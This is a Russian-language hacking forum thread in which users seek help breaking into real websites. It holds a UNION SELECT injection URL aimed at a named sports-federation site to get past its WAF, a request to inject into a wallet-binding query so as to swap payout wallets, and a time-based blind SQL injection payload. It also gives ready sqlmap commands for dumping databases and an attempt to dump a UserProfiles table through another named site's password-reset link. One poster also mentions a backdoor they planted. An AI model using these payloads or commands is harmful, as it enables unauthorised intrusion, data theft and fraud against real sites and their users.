01.06.2020, 18:31
|
|
Познающий
Регистрация: 09.02.2020
Сообщений: 43
С нами:
3295766
Репутация:
3
|
|
Сообщение от pinch
↑
Вопрос все еще актуален, есть у кого-нибудь идеи?
Сам сервер на бэке один ? Балансировка какого-нибудь нету ?
|
|
|
02.06.2020, 06:04
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
отписал в пм, также бэкдор который поставил на php файл (находится на соседней папке) нормально работает, а вот с js такие проблемы
|
|
|
|
02.06.2020, 09:38
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
Опять ваф, помогите обойти, фильт union select
Код:
https://www.lfv.li/nationalmannschaften/u21-nationalmannschaft/mannschaft/detail/?tx_cfcleagueext_pi4%5BprofileId%5D=2057+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+--+
|
|
|
|
03.06.2020, 23:29
|
|
Новичок
Регистрация: 03.06.2020
Сообщений: 2
С нами:
3130166
Репутация:
0
|
|
Нужна помощь
В коде сайта есть код на привязку кошелька
Работает он примерно так:
Код:
SELECT COUNT(*) FROM db_purse WHERE purse1='{$_GET["purse"]}'
Если кошелёк не найден то выполняеться запрос
Код:
UPDATE db_purse SET purse1='{$_GET["purse"]}' WHERE user_id='$id'
Но установить purse1 меня не устрайвает в таблице есть ещё purse2 и purse3, есть ли какаето возможность сформировать $_GET["purse"] таким образом чтобы подменить purse2 или purse3? |
|
|
|
04.06.2020, 08:43
|
|
Познающий
Регистрация: 09.02.2020
Сообщений: 43
С нами:
3295766
Репутация:
3
|
|
Попробуй сначала составить ЖЕЛАЕМЫЙ запрос, который приведет к изменению значения поля, при этом не меняя исходный, а только дополняя его. После этого станет понятно, что модифицировать.
|
|
|
|
10.06.2020, 19:46
|
|
Новичок
Регистрация: 10.06.2020
Сообщений: 1
С нами:
3120086
Репутация:
0
|
|
Приветствую! Помогите правильно составить POST запрос для sqlmap
Код:
bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&player-leagie-box=on&silver=on
|
|
|
|
11.06.2020, 04:03
|
|
Новичок
Регистрация: 03.06.2020
Сообщений: 2
С нами:
3130166
Репутация:
0
|
|
Сообщение от aberkroft
↑
Попробуй сначала составить ЖЕЛАЕМЫЙ запрос, который приведет к изменению значения поля, при этом не меняя исходный, а только дополняя его. После этого станет понятно, что модифицировать.
Я сильно в этом не шарю но всё что перепробывал мне не помогло
|
|
|
|
12.06.2020, 22:06
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами:
5025206
Репутация:
5
|
|
Сообщение от troni900
↑
Приветствую! Помогите правильно составить POST запрос для sqlmap
Код:
bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&player-leagie-box=on&silver=on
Get
Sqlmap.py --url "site.com/index.php?
bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=*&p layer-leagie-box=on&silver=on" --dbs --risk=3 --level=3 --random-agent
Post
Sqlmap.py --url "site.com/index.php" --data="
bronze=on&exclude-legends=on&formation=451&gold=on&leagues%5b%5d=*&p layer-leagie-box=on&silver=on" --dbs --risk=3 --level=3 --random-agent
Суд по всему это выхлоп с акуши, так что я бы сильно не надеялся раскрутить,ещё к тому же слепую, дампится будет хрен пойми сколько, без шела никак
|
|
|
|
12.06.2020, 22:09
|
|
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
С нами:
5738006
Репутация:
147
|
|
акуша)
|
|
|
|
23.06.2020, 01:48
|
|
Новичок
Регистрация: 23.12.2015
Сообщений: 29
С нами:
5468726
Репутация:
0
|
|
Помогите пожалуйста, возвращает пустой результат
Код:
--url="https://eos.aidainternational.org/ResetPassword/3297bc2d-815c-46fd-9488-57433cb3de5a*" --flush-session --risk=3 --level=3 -D dbo -T UserProfiles --dump
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
